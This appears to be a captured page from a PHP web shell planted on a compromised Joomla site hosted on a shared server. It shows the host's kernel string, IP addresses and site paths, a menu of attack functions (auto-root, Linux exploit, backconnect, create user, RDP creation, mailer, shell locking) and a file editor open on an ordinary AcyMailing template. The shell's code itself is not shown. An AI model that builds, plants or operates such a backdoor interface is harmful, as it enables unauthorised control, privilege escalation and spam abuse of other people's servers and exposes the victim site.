Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
modules /
mod_acymailing /
tmpl /
[ HOME SHELL ]
Name
Size
Permission
Action
default.php
11.88
KB
-rw----r--
index.html
44
B
-rw----r--
popup.php
1.02
KB
-rw----r--
tableless.php
13.06
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : popup.php
<?php /** * @package AcyMailing for Joomla! * @version 5.5.0 * @author acyba.com * @copyright (C) 2009-2016 ACYBA S.A.R.L. All rights reserved. * @license GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html */ defined('_JEXEC') or die('Restricted access'); ?><div class="acymailing_module<?php echo $params->get('moduleclass_sfx') ?>" id="acymailing_module_<?php echo $formName; ?>"> <?php if(!empty($mootoolsIntro)) echo '<p class="acymailing_mootoolsintro">'.$mootoolsIntro.'</p>'; ?> <div class="acymailing_mootoolsbutton"> <?php $acypop = acymailing_get('helper.acypopup'); $acypop->useMootools = ($params->get('loadmootools', '1') == 1) ? true : false; $href = acymailing_completeLink('sub&task=display&autofocus=1&formid='.$module->id, true); $link = $acypop->display($mootoolsButton, '', $href, 'acymailing_togglemodule_'.$formName, $params->get('boxwidth', 250), $params->get('boxheight', 200), 'class="acymailing_togglemodule"', '', 'link'); ?> <p><?php echo $link; ?></p> </div> </div>
Close